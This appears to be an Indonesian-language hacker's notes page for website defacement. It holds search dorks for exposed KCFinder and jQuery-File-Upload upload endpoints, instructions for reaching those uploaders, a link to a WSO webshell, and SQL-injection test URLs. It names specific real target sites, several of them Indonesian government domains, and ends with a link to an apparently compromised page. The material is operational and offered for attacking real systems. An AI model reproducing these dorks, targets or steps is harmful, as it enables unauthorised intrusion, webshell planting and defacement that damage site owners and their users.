Dork: inurl:/asset/kcfinder inurl:templates/_editor/kcfinder/ inurl:includes/kcfinder/browse.php inurl:/kcfinder/browse.php lib/kcfinder/files/upload admin/kcfinder/files/upload panel/kcfinder/upload/files editor/kcfinder/upload Kcfinder/upload/files inurl:/panel/kcfinder/ ext:png Exploit: tambahkan /upload.php di belakang kcfinder Tools online https://exploits.my.id/ inurl:"/index.php?option=com_media" admin/ckeditor/kcfinder/upload.php exploit tools web JSO generator JSO Inurl:/admin/hubungi.php Inurl:/add.php intext:"tambah" intext:"Tulis Komentar" https://www.youtube.com/@mr.zeus-x0126 https://rapifilms.com/asset/ https://www.zoemacaron.fr/wp-content/cache/page_enhanced/www.zoemacaron.fr/asset/kcfinder/upload.php/ next try https://www.youtube.com/watch?v=3V_kGij_gpQ https://fhxploit.com/deface-kcfinder-mass-auto-exploiter/ trick ke index https://www.youtube.com/watch?v=MYLmMGFBcNE +server/php target https://www.grulich-rene.cz/kcfinder/browse.php https://pn-pati.go.id/index.php/hubungi-kami -------------------------------------------------------------------------------- Index trick https://pastebin.com/raw/FULTRaZ9 exploit: /server/php/ (exploit paste setelah text jquery-file-upload) contoh: https:www.contohtarget.com/[path]/assets/global/plugins/jquery-file-upload/server/php/ inurl:/assets/global/plugins/jquery-file-upload/ inurl:/assets/plugins/jquery-file-upload intext:Metronic Shop UI description. inurl:/plugins/jquery-file-upload/ inurl:/plugins/jQuery-File-Upload/ inurl:/vendor/jquery-file-upload/ inurl:/assets/jquery-file-upload/ inurl:/admin/jquery-file-upload/ target https://jdih.dephub.go.id/assets/global/plugins/jquery-file-upload/server/php/ http://52.33.30.75/mis/assets/global/plugins/jquery-file-upload/ http://gisportal.acehprov.go.id/ inurl examples/upload.html inurl:page/detail/ site:go.id ------------------------------- https://cwatch.comodo.com/blog/website-security/hack-this-site-in-7-steps/ list of websites with dork PHP. 
inurl:.php?id= ------------------------
--------------- xss attack 192.168.138.150/multilidae/index/php Tinggal tusbol deh pakai SC Deface / Shell lu bro ;v --------------------------------------------------- kali linux Video tutorial https://www.youtube.com/watch?v=9bIw51twZQA video hack fhxploit https://www.youtube.com/watch?v=YriYszGRCaI file webshell https://github.com/tennc/webshell/blob/master/xakep-shells/PHP/wso.txt -------------------------------------------------------- sql inject step : https://cwatch.comodo.com/blog/website-security/hack-this-site-in-7-steps/ dock : inurl:.php?id= site:go.id target https://www.promare.be/shop.php?id=1%27 http://esjindex.org/search.php?id=1%27 http://berkeleyrecycling.org/page.php?id=5%27 ------------------------------------------------------------ inurl:examples/ uploadbutton.html https://www.youtube.com/watch?v=0Cg70qrS9rI sucess http://www.mtcbus.com.tw//Public/Js/kindeditor/attached/file/20221204/20221204162241_61847.html